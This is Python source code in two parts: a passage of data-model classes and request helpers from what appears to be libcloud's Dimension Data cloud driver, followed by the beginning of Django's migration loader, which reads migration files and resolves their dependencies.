        :param data: The data payload to be added to the request
        :type data: ``str``

        :param headers: Additional header to be added to the request
        :type headers: ``str`` or ``dict`` or ``None``

        :param method: HTTP Method for the request (i.e. 'GET', 'POST')
        :type method: ``str``

        :param page_size: The size of each page to be returned
                          Note: Max page size in MCP2.0 is currently 250
        :type page_size: ``int``
        """
        if params is None:
            params = {}
        params['pageSize'] = page_size
        paged_resp = self.request_with_orgId_api_2(action, params,
                                                   data, headers,
                                                   method).object
        yield paged_resp
        paged_resp = paged_resp or {}
        # NOTE(review): if the response lacks pageCount/pageSize
        # attributes, .get() returns None and int(None) raises TypeError —
        # presumably the API always sends them on paged listings; confirm.
        while int(paged_resp.get('pageCount')) >= \
                int(paged_resp.get('pageSize')):
            params['pageNumber'] = int(paged_resp.get('pageNumber')) + 1
            paged_resp = self.request_with_orgId_api_2(action, params,
                                                       data, headers,
                                                       method).object
            yield paged_resp
    def get_resource_path_api_1(self):
        """
        This method returns a resource path which is necessary for referencing
        resources that require a full path instead of just an ID, such as
        networks, and customer snapshots.
        """
        return ("%s/%s/%s" % (self.api_path_version_1, self.api_version_1,
                              self._get_orgId()))
    def get_resource_path_api_2(self):
        """
        This method returns a resource path which is necessary for referencing
        resources that require a full path instead of just an ID, such as
        networks, and customer snapshots.
        """
        return ("%s/%s/%s" % (self.api_path_version_2, self.api_version_2,
                              self._get_orgId()))
    def wait_for_state(self, state, func, poll_interval=2, timeout=60, *args,
                       **kwargs):
        """
        Wait for the function which returns a instance with field status/state
        to match.
        Keep polling func until one of the desired states is matched

        :param state: Either the desired state (`str`) or a `list` of states
        :type state: ``str`` or ``list``

        :param func: The function to call, e.g. ex_get_vlan. Note: This
                     function needs to return an object which has ``status``
                     attribute.
        :type func: ``function``

        :param poll_interval: The number of seconds to wait between checks
        :type poll_interval: `int`

        :param timeout: The total number of seconds to wait to reach a state
        :type timeout: `int`

        :param args: The arguments for func
        :type args: Positional arguments

        :param kwargs: The arguments for func
        :type kwargs: Keyword arguments

        :return: Result from the calling function.
        """
        cnt = 0
        while cnt < timeout / poll_interval:
            result = func(*args, **kwargs)
            # Node exposes .state; other DD objects expose .status.
            if isinstance(result, Node):
                object_state = result.state
            else:
                object_state = result.status
            # NOTE(review): 'is' compares identity, and for a str ``state``
            # the 'in' test is substring matching — confirm both behaviors
            # are intended here.
            if object_state is state or object_state in state:
                return result
            sleep(poll_interval)
            cnt += 1
        msg = 'Status check for object %s timed out' % (result)
        raise DimensionDataAPIException(code=object_state,
                                        msg=msg,
                                        driver=self.driver)
    def _get_orgId(self):
        """
        Send the /myaccount API request to DimensionData cloud and parse the
        'orgId' from the XML response object. We need the orgId to use most
        of the other API functions
        """
        if self._orgId is None:
            body = self.request_api_1('myaccount').object
            self._orgId = findtext(body, 'orgId', DIRECTORY_NS)
        return self._orgId
    def get_account_details(self):
        """
        Get the details of this account

        :rtype: :class:`DimensionDataAccountDetails`
        """
        body = self.request_api_1('myaccount').object
        return DimensionDataAccountDetails(
            user_name=findtext(body, 'userName', DIRECTORY_NS),
            full_name=findtext(body, 'fullName', DIRECTORY_NS),
            first_name=findtext(body, 'firstName', DIRECTORY_NS),
            last_name=findtext(body, 'lastName', DIRECTORY_NS),
            email=findtext(body, 'emailAddress', DIRECTORY_NS))
class DimensionDataAccountDetails(object):
    """
    Dimension Data account class details
    """
    def __init__(self, user_name, full_name, first_name, last_name, email):
        """
        :param user_name: Login name of the account
        :param full_name: Full display name
        :param first_name: Given name
        :param last_name: Family name
        :param email: Contact e-mail address
        """
        self.user_name = user_name
        self.full_name = full_name
        self.first_name = first_name
        self.last_name = last_name
        self.email = email
class DimensionDataStatus(object):
    """
    Status of a pending DimensionData API operation, including the
    current step and the failure reason when the operation failed.
    """
    def __init__(self, action=None, request_time=None, user_name=None,
                 number_of_steps=None, update_time=None, step_name=None,
                 step_number=None, step_percent_complete=None,
                 failure_reason=None):
        """
        :param action: Name of the requested operation
        :param request_time: When the operation was requested
        :param user_name: User who requested the operation
        :param number_of_steps: Total number of steps
        :param update_time: Time of the last status update
        :param step_name: Name of the current step
        :param step_number: Index of the current step
        :param step_percent_complete: Progress of the current step
        :param failure_reason: Why the operation failed, if it did
        """
        self.action = action
        self.request_time = request_time
        self.user_name = user_name
        self.number_of_steps = number_of_steps
        self.update_time = update_time
        self.step_name = step_name
        self.step_number = step_number
        self.step_percent_complete = step_percent_complete
        self.failure_reason = failure_reason
    def __repr__(self):
        template = ('<DimensionDataStatus: action=%s, request_time=%s, '
                    'user_name=%s, number_of_steps=%s, update_time=%s, '
                    'step_name=%s, step_number=%s, '
                    'step_percent_complete=%s, failure_reason=%s>')
        fields = (self.action, self.request_time, self.user_name,
                  self.number_of_steps, self.update_time, self.step_name,
                  self.step_number, self.step_percent_complete,
                  self.failure_reason)
        return template % fields
class DimensionDataNetwork(object):
    """
    DimensionData network with location.
    """
    def __init__(self, id, name, description, location, private_net,
                 multicast, status):
        """
        :param id: Identifier of the network (stored as ``str``)
        :param name: Network name
        :param description: Free-form description
        :param location: Location of the network
        :param private_net: Private network information
        :param multicast: Multicast flag
        :param status: Current status of the network
        """
        self.id = str(id)
        self.name = name
        self.description = description
        self.location = location
        self.private_net = private_net
        self.multicast = multicast
        self.status = status
    def __repr__(self):
        # status is deliberately left out of the repr.
        template = ('<DimensionDataNetwork: id=%s, name=%s, description=%s, '
                    'location=%s, private_net=%s, multicast=%s>')
        return template % (self.id, self.name, self.description,
                           self.location, self.private_net, self.multicast)
class DimensionDataNetworkDomain(object):
    """
    DimensionData network domain with location.
    """
    def __init__(self, id, name, description, location, status, plan):
        """
        :param id: Identifier of the network domain (stored as ``str``)
        :param name: Name of the network domain
        :param description: Free-form description
        :param location: Location of the network domain
        :param status: Current status
        :param plan: Service plan (see :class:`NetworkDomainServicePlan`)
        """
        self.id = str(id)
        self.name = name
        self.description = description
        self.location = location
        self.status = status
        self.plan = plan
    def __repr__(self):
        # plan is deliberately left out of the repr.
        template = ('<DimensionDataNetworkDomain: id=%s, name=%s, '
                    'description=%s, location=%s, status=%s>')
        return template % (self.id, self.name, self.description,
                           self.location, self.status)
class DimensionDataPublicIpBlock(object):
    """
    DimensionData Public IP Block with location.
    """
    def __init__(self, id, base_ip, size, location, network_domain,
                 status):
        """
        :param id: Identifier of the block (stored as ``str``)
        :param base_ip: First IP address of the block
        :param size: Number of addresses in the block
        :param location: Location of the block
        :param network_domain: Owning network domain
        :param status: Current status
        """
        self.id = str(id)
        self.base_ip = base_ip
        self.size = size
        self.location = location
        self.network_domain = network_domain
        self.status = status
    def __repr__(self):
        # Fixed: previously reported itself as 'DimensionDataNetworkDomain'
        # (copy-paste bug).
        return (('<DimensionDataPublicIpBlock: id=%s, base_ip=%s, '
                 'size=%s, location=%s, status=%s>')
                % (self.id, self.base_ip, self.size, self.location,
                   self.status))
class DimensionDataServerCpuSpecification(object):
    """
    A class that represents the specification of the CPU(s) for a
    node
    """
    def __init__(self, cpu_count, cores_per_socket, performance):
        """
        Instantiate a new :class:`DimensionDataServerCpuSpecification`

        :param cpu_count: The number of CPUs
        :type cpu_count: ``int``

        :param cores_per_socket: The number of cores per socket, the
            recommendation is 1
        :type cores_per_socket: ``int``

        :param performance: The performance type, e.g. HIGHPERFORMANCE
        :type performance: ``str``
        """
        self.cpu_count = cpu_count
        self.cores_per_socket = cores_per_socket
        self.performance = performance
    def __repr__(self):
        template = ('<DimensionDataServerCpuSpecification: '
                    'cpu_count=%s, cores_per_socket=%s, '
                    'performance=%s>')
        return template % (self.cpu_count, self.cores_per_socket,
                           self.performance)
class DimensionDataServerDisk(object):
    """
    A class that represents the disk on a server
    """
    def __init__(self, id, scsi_id, size_gb, speed, state):
        """
        Instantiate a new :class:`DimensionDataServerDisk`

        :param id: The id of the disk
        :type id: ``str``

        :param scsi_id: Representation for scsi
        :type scsi_id: ``int``

        :param size_gb: Size of the disk
        :type size_gb: ``int``

        :param speed: Speed of the disk (i.e. STANDARD)
        :type speed: ``str``

        :param state: State of the disk (i.e. PENDING)
        :type state: ``str``
        """
        self.id = id
        self.scsi_id = scsi_id
        self.size_gb = size_gb
        self.speed = speed
        self.state = state
    def __repr__(self):
        # Fixed: the repr string was missing its closing '>'.
        return (('<DimensionDataServerDisk: '
                 'id=%s, size_gb=%s>')
                % (self.id, self.size_gb))
class DimensionDataServerVMWareTools(object):
    """
    A class that represents the VMWareTools for a node
    """
    def __init__(self, status, version_status, api_version):
        """
        Instantiate a new :class:`DimensionDataServerVMWareTools` object

        :param status: The status of VMWare Tools
        :type status: ``str``

        :param version_status: The status for the version of VMWare Tools
            (i.e NEEDS_UPGRADE)
        :type version_status: ``str``

        :param api_version: The API version of VMWare Tools
        :type api_version: ``str``
        """
        self.status = status
        self.version_status = version_status
        self.api_version = api_version
    def __repr__(self):
        # Consistency fix: added the ':' after the class name that every
        # other __repr__ in this module uses.
        return (('<DimensionDataServerVMWareTools: '
                 'status=%s, version_status=%s, '
                 'api_version=%s>')
                % (self.status, self.version_status, self.api_version))
class DimensionDataFirewallRule(object):
    """
    DimensionData Firewall Rule for a network domain
    """
    def __init__(self, id, name, action, location, network_domain,
                 status, ip_version, protocol, source, destination,
                 enabled):
        """
        :param id: Identifier of the rule (stored as ``str``)
        :param name: Name of the rule
        :param action: Rule action (e.g. ACCEPT_DECISIVELY)
        :param location: Location of the rule
        :param network_domain: Owning network domain
        :param status: Current status
        :param ip_version: IP version the rule applies to
        :param protocol: Protocol matched by the rule
        :param source: Source address specification
        :param destination: Destination address specification
        :param enabled: Whether the rule is active
        """
        self.id = str(id)
        self.name = name
        self.action = action
        self.location = location
        self.network_domain = network_domain
        self.status = status
        self.ip_version = ip_version
        self.protocol = protocol
        self.source = source
        self.destination = destination
        self.enabled = enabled
    def __repr__(self):
        template = ('<DimensionDataFirewallRule: id=%s, name=%s, '
                    'action=%s, location=%s, network_domain=%s, '
                    'status=%s, ip_version=%s, protocol=%s, source=%s, '
                    'destination=%s, enabled=%s>')
        fields = (self.id, self.name, self.action, self.location,
                  self.network_domain, self.status, self.ip_version,
                  self.protocol, self.source, self.destination,
                  self.enabled)
        return template % fields
class DimensionDataFirewallAddress(object):
    """
    The source or destination model in a firewall rule
    """
    def __init__(self, any_ip, ip_address, ip_prefix_size,
                 port_begin, port_end, address_list_id,
                 port_list_id):
        """
        :param any_ip: Whether the rule matches any address
        :param ip_address: Specific IP address matched
        :param ip_prefix_size: CIDR prefix size of the match
        :param port_begin: First port of the matched range
        :param port_end: Last port of the matched range
        :param address_list_id: Id of a referenced address list
        :param port_list_id: Id of a referenced port list
        """
        self.any_ip = any_ip
        self.ip_address = ip_address
        self.ip_prefix_size = ip_prefix_size
        self.port_begin = port_begin
        self.port_end = port_end
        self.address_list_id = address_list_id
        self.port_list_id = port_list_id
class DimensionDataNatRule(object):
    """
    An IP NAT rule in a network domain
    """
    def __init__(self, id, network_domain, internal_ip, external_ip, status):
        """
        :param id: Identifier of the NAT rule
        :param network_domain: Owning network domain
        :param internal_ip: Internal (private) address
        :param external_ip: External (public) address
        :param status: Current status
        """
        self.id = id
        self.network_domain = network_domain
        self.internal_ip = internal_ip
        self.external_ip = external_ip
        self.status = status
    def __repr__(self):
        template = '<DimensionDataNatRule: id=%s, status=%s>'
        return template % (self.id, self.status)
class DimensionDataAntiAffinityRule(object):
    """
    Anti-Affinity rule for DimensionData

    An Anti-Affinity rule ensures that servers in the rule will
    not reside on the same VMware ESX host.
    """
    def __init__(self, id, node_list):
        """
        Instantiate a new :class:`DimensionDataAntiAffinityRule`

        :param id: The ID of the Anti-Affinity rule
        :type id: ``str``

        :param node_list: List of node ids that belong in this rule
        :type node_list: ``list`` of ``str``
        """
        self.id = id
        self.node_list = node_list
    def __repr__(self):
        template = '<DimensionDataAntiAffinityRule: id=%s>'
        return template % (self.id)
class DimensionDataVlan(object):
    """
    DimensionData VLAN.
    """
    def __init__(self, id, name, description, location, network_domain,
                 status, private_ipv4_range_address, private_ipv4_range_size,
                 ipv6_range_address, ipv6_range_size, ipv4_gateway,
                 ipv6_gateway):
        """
        Initialize an instance of ``DimensionDataVlan``

        :param id: The ID of the VLAN (stored as ``str``)
        :param name: The name of the VLAN
        :param description: Plain text description of the VLAN
        :param location: The location (data center) of the VLAN
        :param network_domain: The Network Domain that owns this VLAN
        :param status: The status of the VLAN
        :param private_ipv4_range_address: Host address of the IPv4 space
        :param private_ipv4_range_size: CIDR size of the IPv4 range
        :param ipv6_range_address: Host address of the IPv6 space
        :param ipv6_range_size: CIDR size of the IPv6 range
        :param ipv4_gateway: The IPv4 default gateway address
        :param ipv6_gateway: The IPv6 default gateway address
        """
        self.id = str(id)
        self.name = name
        self.location = location
        self.description = description
        self.network_domain = network_domain
        self.status = status
        self.private_ipv4_range_address = private_ipv4_range_address
        self.private_ipv4_range_size = private_ipv4_range_size
        self.ipv6_range_address = ipv6_range_address
        self.ipv6_range_size = ipv6_range_size
        self.ipv4_gateway = ipv4_gateway
        self.ipv6_gateway = ipv6_gateway
    def __repr__(self):
        template = ('<DimensionDataVlan: id=%s, name=%s, '
                    'description=%s, location=%s, status=%s>')
        return template % (self.id, self.name, self.description,
                           self.location, self.status)
class DimensionDataPool(object):
    """
    DimensionData VIP Pool.
    """
    def __init__(self, id, name, description, status, load_balance_method,
                 health_monitor_id, service_down_action, slow_ramp_time):
        """
        Initialize an instance of ``DimensionDataPool``

        :param id: The ID of the pool (stored as ``str``)
        :param name: The name of the pool
        :param description: Plain text description of the pool
        :param status: The status of the pool
        :param load_balance_method: The load balancer method
        :param health_monitor_id: The ID of the health monitor
        :param service_down_action: Action to take when pool is down
        :param slow_ramp_time: The ramp-up time for service recovery
        """
        self.id = str(id)
        self.name = name
        self.description = description
        self.status = status
        self.load_balance_method = load_balance_method
        self.health_monitor_id = health_monitor_id
        self.service_down_action = service_down_action
        self.slow_ramp_time = slow_ramp_time
    def __repr__(self):
        template = ('<DimensionDataPool: id=%s, name=%s, '
                    'description=%s, status=%s>')
        return template % (self.id, self.name, self.description,
                           self.status)
class DimensionDataPoolMember(object):
    """
    DimensionData VIP Pool Member.
    """
    def __init__(self, id, name, status, ip, port, node_id):
        """
        Initialize an instance of ``DimensionDataPoolMember``

        :param id: The ID of the pool member (stored as ``str``)
        :param name: The name of the pool member
        :param status: The status of the pool
        :param ip: The IP of the pool member
        :param port: The port of the pool member
        :param node_id: The ID of the associated node
        """
        self.id = str(id)
        self.name = name
        self.status = status
        self.ip = ip
        self.port = port
        self.node_id = node_id
    def __repr__(self):
        template = ('<DimensionDataPoolMember: id=%s, name=%s, '
                    'ip=%s, status=%s, port=%s, node_id=%s>')
        return template % (self.id, self.name,
                           self.ip, self.status, self.port,
                           self.node_id)
class DimensionDataVIPNode(object):
    """A node behind a DimensionData VIP."""
    def __init__(self, id, name, status, ip, connection_limit='10000',
                 connection_rate_limit='10000'):
        """
        Initialize an instance of :class:`DimensionDataVIPNode`

        :param id: The ID of the node (stored as ``str``)
        :param name: The name of the node
        :param status: The status of the node
        :param ip: The IP of the node
        :param connection_limit: The total connection limit for the node
            (note: the default is the string '10000')
        :param connection_rate_limit: The rate limit for the node
            (note: the default is the string '10000')
        """
        self.id = str(id)
        self.name = name
        self.status = status
        self.ip = ip
        self.connection_limit = connection_limit
        self.connection_rate_limit = connection_rate_limit
    def __repr__(self):
        template = ('<DimensionDataVIPNode: id=%s, name=%s, '
                    'status=%s, ip=%s>')
        return template % (self.id, self.name,
                           self.status, self.ip)
class DimensionDataVirtualListener(object):
    """
    DimensionData Virtual Listener.
    """
    def __init__(self, id, name, status, ip):
        """
        Initialize an instance of :class:`DimensionDataVirtualListener`

        :param id: The ID of the listener (stored as ``str``)
        :param name: The name of the listener
        :param status: The status of the listener
        :param ip: The IP of the listener
        """
        self.id = str(id)
        self.name = name
        self.status = status
        self.ip = ip
    def __repr__(self):
        template = ('<DimensionDataVirtualListener: id=%s, name=%s, '
                    'status=%s, ip=%s>')
        return template % (self.id, self.name,
                           self.status, self.ip)
class DimensionDataDefaultHealthMonitor(object):
    """
    A default health monitor for a VIP (node, pool or listener).
    """

    def __init__(self, id, name, node_compatible, pool_compatible):
        """
        Create a health-monitor description.

        :param id: The ID of the monitor
        :type id: ``str``

        :param name: The name of the monitor
        :type name: ``str``

        :param node_compatible: Whether the monitor can monitor nodes
        :type node_compatible: ``bool``

        :param pool_compatible: Whether the monitor can monitor pools
        :type pool_compatible: ``bool``
        """
        self.id = id
        self.name = name
        self.node_compatible = node_compatible
        self.pool_compatible = pool_compatible

    def __repr__(self):
        return ('<DimensionDataDefaultHealthMonitor: id=%s, name=%s>'
                % (self.id, self.name))
class DimensionDataPersistenceProfile(object):
    """
    Each Persistence Profile declares which combinations of Virtual
    Listener type and protocol it is compatible with, and whether it may
    be used as a Fallback Persistence Profile.
    """

    def __init__(self, id, name, compatible_listeners, fallback_compatible):
        """
        Create a persistence-profile description.

        :param id: The ID of the profile
        :type id: ``str``

        :param name: The name of the profile
        :type name: ``str``

        :param compatible_listeners: Compatible Virtual Listener types
        :type compatible_listeners: ``list`` of
            :class:`DimensionDataVirtualListenerCompatibility`

        :param fallback_compatible: Whether usable as a fallback profile
        :type fallback_compatible: ``bool``
        """
        self.id = id
        self.name = name
        self.compatible_listeners = compatible_listeners
        self.fallback_compatible = fallback_compatible

    def __repr__(self):
        return ('<DimensionDataPersistenceProfile: id=%s, name=%s>'
                % (self.id, self.name))
class DimensionDataDefaultiRule(object):
    """
    A default iRule for a network domain; can be applied to a listener.
    """

    def __init__(self, id, name, compatible_listeners):
        """
        Create an iRule description.

        :param id: The ID of the iRule
        :type id: ``str``

        :param name: The name of the iRule
        :type name: ``str``

        :param compatible_listeners: Compatible Virtual Listener types
        :type compatible_listeners: ``list`` of
            :class:`DimensionDataVirtualListenerCompatibility`
        """
        self.id = id
        self.name = name
        self.compatible_listeners = compatible_listeners

    def __repr__(self):
        return ('<DimensionDataDefaultiRule: id=%s, name=%s>'
                % (self.id, self.name))
class DimensionDataVirtualListenerCompatibility(object):
    """
    A compatibility entry for a persistence profile or iRule: names one
    virtual listener type/protocol the profile or iRule can be applied to.
    """

    def __init__(self, type, protocol):
        # Listener type and protocol this entry declares compatibility with.
        self.type = type
        self.protocol = protocol

    def __repr__(self):
        return ('<DimensionDataVirtualListenerCompatibility: '
                'type=%s, protocol=%s>'
                % (self.type, self.protocol))
class DimensionDataBackupDetails(object):
    """
    Describes the backup configuration of a single backup target.
    """

    def __init__(self, asset_id, service_plan, status, clients=None):
        """
        Create a backup-details description.

        :param asset_id: Asset identification for backups
        :type asset_id: ``str``

        :param service_plan: The service plan for backups, e.g. "Essentials"
        :type service_plan: ``str``

        :param status: The overall status of this backup target,
                       e.g. "unregistered"
        :type status: ``str``

        :param clients: Backup clients attached to this target
        :type clients: ``list`` of :class:`DimensionDataBackupClient`
        """
        self.asset_id = asset_id
        self.service_plan = service_plan
        self.status = status
        self.clients = clients

    def __repr__(self):
        return ('<DimensionDataBackupDetails: id=%s>'
                % (self.asset_id))
class DimensionDataBackupClient(object):
    """
    An object that represents a backup client
    """
    def __init__(self, id, type, status,
                 schedule_policy, storage_policy, download_url,
                 alert=None, running_job=None):
        """
        Initialize an instance of :class:`DimensionDataBackupClient`
        :param id: Unique ID for the client
        :type id: ``str``
        :param type: The type of client that this client is
        :type type: :class:`DimensionDataBackupClientType`
        :param status: The states of this particular backup client.
                       i.e. (Unregistered)
        :type status: ``str``
        :param schedule_policy: The schedule policy for this client
                                NOTE: Dimension Data only sends back the name
                                of the schedule policy, no further details
        :type schedule_policy: ``str``
        :param storage_policy: The storage policy for this client
                               NOTE: Dimension Data only sends back the name
                               of the storage policy, no further details
        :type storage_policy: ``str``
        :param download_url: The download url for this client
        :type download_url: ``str``
        :param alert: The alert configured for this backup client (optional)
        :type alert: :class:`DimensionDataBackupClientAlert`
        :param running_job: The running job for the client (optional)
        :type running_job: :class:`DimensionDataBackupClientRunningJob`
        """
        self.id = id
        self.type = type
        self.status = status
        self.schedule_policy = schedule_policy
        self.storage_policy = storage_policy
        self.download_url = download_url
        self.alert = alert
        self.running_job = running_job
    def __repr__(self):
        return (('<DimensionDataBackupClient: id=%s>')
                % (self.id))
class DimensionDataBackupClientAlert(object):
    """
    An alert for a backup client
    """
    def __init__(self, trigger, notify_list=None):
        """
        Initialize an instance of :class:`DimensionDataBackupClientAlert`
        :param trigger: Trigger type for the client i.e. ON_FAILURE
        :type trigger: ``str``
        :param notify_list: List of email addresses that are notified
                            when the alert is fired (defaults to an empty
                            list)
        :type notify_list: ``list`` of ``str``
        """
        self.trigger = trigger
        # None sentinel instead of a mutable default argument: a default of
        # [] would be a single list object shared (and mutable) across every
        # instance constructed without an explicit notify_list.
        self.notify_list = notify_list if notify_list is not None else []
    def __repr__(self):
        return (('<DimensionDataBackupClientAlert: trigger=%s>')
                % (self.trigger))
class DimensionDataBackupClientRunningJob(object):
    """
    A running job for a given backup client
    """
    def __init__(self, id, status, percentage=0):
        """
        Initialize an instance of :class:`DimensionDataBackupClientRunningJob`
        :param id: The unique ID of the job
        :type id: ``str``
        :param status: The status of the job i.e. Waiting
        :type status: ``str``
        :param percentage: The percentage completion of the job
        :type percentage: ``int``
        """
        self.id = id
        self.percentage = percentage
        self.status = status
    def __repr__(self):
        return (('<DimensionDataBackupClientRunningJob: id=%s>')
                % (self.id))
class DimensionDataBackupClientType(object):
    """
    A client type object for backups
    """
    def __init__(self, type, is_file_system, description):
        """
        Initialize an instance of :class:`DimensionDataBackupClientType`
        :param type: The type of client i.e. (FA.Linux, MySQL, ect.)
        :type type: ``str``
        :param is_file_system: Whether the client is a file system client
        :type is_file_system: ``bool``
        :param description: Description of the client
        :type description: ``str``
        """
        self.type = type
        self.is_file_system = is_file_system
        self.description = description
    def __repr__(self):
        return (('<DimensionDataBackupClientType: type=%s>')
                % (self.type))
class DimensionDataBackupStoragePolicy(object):
    """
    A storage policy for backups (retention and secondary location).
    """

    def __init__(self, name, retention_period, secondary_location):
        """
        Create a storage-policy description.

        :param name: Policy name, e.g. "14 Day Storage Policy"
        :type name: ``str``

        :param retention_period: How long the backup is kept, in days
        :type retention_period: ``int``

        :param secondary_location: The secondary location, e.g. "Primary"
        :type secondary_location: ``str``
        """
        self.name = name
        self.retention_period = retention_period
        self.secondary_location = secondary_location

    def __repr__(self):
        return '<DimensionDataBackupStoragePolicy: name=%s>' % self.name
class DimensionDataBackupSchedulePolicy(object):
    """
    A schedule policy for backups (named time window).
    """

    def __init__(self, name, description):
        """
        Create a schedule-policy description.

        :param name: Policy name, e.g. "12AM - 6AM"
        :type name: ``str``

        :param description: Short summary of the policy details
        :type description: ``str``
        """
        self.name = name
        self.description = description

    def __repr__(self):
        return '<DimensionDataBackupSchedulePolicy: name=%s>' % self.name
class DimensionDataTag(object):
    """
    A representation of a Tag in Dimension Data
    A Tag first must have a Tag Key, then an asset is tagged with
    a key and an optional value. Tags can be queried later to filter assets
    and also show up on usage reports if so desired.
    """
    def __init__(self, asset_type, asset_id, asset_name,
                 datacenter, key, value):
        """
        Initialize an instance of :class:`DimensionDataTag`
        :param asset_type: The type of asset. Current asset types:
                           SERVER, VLAN, NETWORK_DOMAIN, CUSTOMER_IMAGE,
                           PUBLIC_IP_BLOCK, ACCOUNT
        :type asset_type: ``str``
        :param asset_id: The GUID of the asset that is tagged
        :type asset_id: ``str``
        :param asset_name: The name of the asset that is tagged
        :type asset_name: ``str``
        :param datacenter: The short datacenter name of the tagged asset
        :type datacenter: ``str``
        :param key: The tagged key
        :type key: :class:`DimensionDataTagKey`
        :param value: The tagged value
        :type value: ``None`` or ``str``
        """
        self.asset_type = asset_type
        self.asset_id = asset_id
        self.asset_name = asset_name
        self.datacenter = datacenter
        self.key = key
        self.value = value
    def __repr__(self):
        return (('<DimensionDataTag: asset_name=%s, tag_name=%s, value=%s>')
                % (self.asset_name, self.key.name, self.value))
class DimensionDataTagKey(object):
    """
    A Tag Key in Dimension Data; a tag key is required to tag an asset.
    """

    def __init__(self, id, name, description,
                 value_required, display_on_report):
        """
        Create a tag-key description.

        :param id: GUID of the tag key
        :type id: ``str``

        :param name: Name of the tag key
        :type name: ``str``

        :param description: Description of the tag key
        :type description: ``str``

        :param value_required: Whether a value is required for this tag key
        :type value_required: ``bool``

        :param display_on_report: Whether this tag key should be displayed
                                  on usage reports
        :type display_on_report: ``bool``
        """
        self.id = id
        self.name = name
        self.description = description
        self.value_required = value_required
        self.display_on_report = display_on_report

    def __repr__(self):
        return '<DimensionDataTagKey: name=%s>' % self.name
| |
import pkgutil
import sys
from importlib import import_module, reload
from django.apps import apps
from django.conf import settings
from django.db.migrations.graph import MigrationGraph
from django.db.migrations.recorder import MigrationRecorder
from .exceptions import (
AmbiguityError, BadMigrationError, InconsistentMigrationHistory,
NodeNotFoundError,
)
MIGRATIONS_MODULE_NAME = 'migrations'
class MigrationLoader:
    """
    Load migration files from disk and their status from the database.
    Migration files are expected to live in the "migrations" directory of
    an app. Their names are entirely unimportant from a code perspective,
    but will probably follow the 1234_name.py convention.
    On initialization, this class will scan those directories, and open and
    read the Python files, looking for a class called Migration, which should
    inherit from django.db.migrations.Migration. See
    django.db.migrations.migration for what that looks like.
    Some migrations will be marked as "replacing" another set of migrations.
    These are loaded into a separate set of migrations away from the main ones.
    If all the migrations they replace are either unapplied or missing from
    disk, then they are injected into the main set, replacing the named migrations.
    Any dependency pointers to the replaced migrations are re-pointed to the
    new migration.
    This does mean that this class MUST also talk to the database as well as
    to disk, but this is probably fine. We're already not just operating
    in memory.
    """
    def __init__(self, connection, load=True, ignore_no_migrations=False):
        # connection may be None; build_graph() then treats every migration
        # as unapplied instead of querying the recorder.
        self.connection = connection
        self.disk_migrations = None
        self.applied_migrations = None
        self.ignore_no_migrations = ignore_no_migrations
        if load:
            self.build_graph()
    @classmethod
    def migrations_module(cls, app_label):
        """
        Return the path to the migrations module for the specified app_label
        and a boolean indicating if the module is specified in
        settings.MIGRATION_MODULES.
        """
        if app_label in settings.MIGRATION_MODULES:
            return settings.MIGRATION_MODULES[app_label], True
        else:
            app_package_name = apps.get_app_config(app_label).name
            return '%s.%s' % (app_package_name, MIGRATIONS_MODULE_NAME), False
    def load_disk(self):
        """Load the migrations from all INSTALLED_APPS from disk."""
        # Maps (app_label, migration_name) -> Migration instance.
        self.disk_migrations = {}
        self.unmigrated_apps = set()
        self.migrated_apps = set()
        for app_config in apps.get_app_configs():
            # Get the migrations module directory
            module_name, explicit = self.migrations_module(app_config.label)
            if module_name is None:
                self.unmigrated_apps.add(app_config.label)
                continue
            was_loaded = module_name in sys.modules
            try:
                module = import_module(module_name)
            except ImportError as e:
                # I hate doing this, but I don't want to squash other import errors.
                # Might be better to try a directory check directly.
                if ((explicit and self.ignore_no_migrations) or (
                        not explicit and "No module named" in str(e) and MIGRATIONS_MODULE_NAME in str(e))):
                    self.unmigrated_apps.add(app_config.label)
                    continue
                raise
            else:
                # Empty directories are namespaces.
                # getattr() needed on PY36 and older (replace w/attribute access).
                if getattr(module, '__file__', None) is None:
                    self.unmigrated_apps.add(app_config.label)
                    continue
                # Module is not a package (e.g. migrations.py).
                if not hasattr(module, '__path__'):
                    self.unmigrated_apps.add(app_config.label)
                    continue
                # Force a reload if it's already loaded (tests need this)
                if was_loaded:
                    reload(module)
            self.migrated_apps.add(app_config.label)
            # Only plain (non-package) submodules whose names don't start
            # with '_' or '~' are considered migration files.
            migration_names = {
                name for _, name, is_pkg in pkgutil.iter_modules(module.__path__)
                if not is_pkg and name[0] not in '_~'
            }
            # Load migrations
            for migration_name in migration_names:
                migration_path = '%s.%s' % (module_name, migration_name)
                try:
                    migration_module = import_module(migration_path)
                except ImportError as e:
                    if 'bad magic number' in str(e):
                        raise ImportError(
                            "Couldn't import %r as it appears to be a stale "
                            ".pyc file." % migration_path
                        ) from e
                    else:
                        raise
                if not hasattr(migration_module, "Migration"):
                    raise BadMigrationError(
                        "Migration %s in app %s has no Migration class" % (migration_name, app_config.label)
                    )
                self.disk_migrations[app_config.label, migration_name] = migration_module.Migration(
                    migration_name,
                    app_config.label,
                )
    def get_migration(self, app_label, name_prefix):
        """Return the named migration or raise NodeNotFoundError."""
        return self.graph.nodes[app_label, name_prefix]
    def get_migration_by_prefix(self, app_label, name_prefix):
        """
        Return the migration(s) which match the given app label and name_prefix.

        Raises AmbiguityError when more than one migration matches and
        KeyError when none do.
        """
        # Do the search
        results = []
        for migration_app_label, migration_name in self.disk_migrations:
            if migration_app_label == app_label and migration_name.startswith(name_prefix):
                results.append((migration_app_label, migration_name))
        if len(results) > 1:
            raise AmbiguityError(
                "There is more than one migration for '%s' with the prefix '%s'" % (app_label, name_prefix)
            )
        elif not results:
            raise KeyError("There no migrations for '%s' with the prefix '%s'" % (app_label, name_prefix))
        else:
            return self.disk_migrations[results[0]]
    def check_key(self, key, current_app):
        """
        Resolve a dependency key, mapping the special "__first__" /
        "__latest__" names to a concrete graph node, or return None when
        the dependency can safely be ignored.
        """
        if (key[1] != "__first__" and key[1] != "__latest__") or key in self.graph:
            return key
        # Special-case __first__, which means "the first migration" for
        # migrated apps, and is ignored for unmigrated apps. It allows
        # makemigrations to declare dependencies on apps before they even have
        # migrations.
        if key[0] == current_app:
            # Ignore __first__ references to the same app (#22325)
            return
        if key[0] in self.unmigrated_apps:
            # This app isn't migrated, but something depends on it.
            # The models will get auto-added into the state, though
            # so we're fine.
            return
        if key[0] in self.migrated_apps:
            try:
                if key[1] == "__first__":
                    return self.graph.root_nodes(key[0])[0]
                else:  # "__latest__"
                    return self.graph.leaf_nodes(key[0])[0]
            except IndexError:
                if self.ignore_no_migrations:
                    return None
                else:
                    raise ValueError("Dependency on app with no migrations: %s" % key[0])
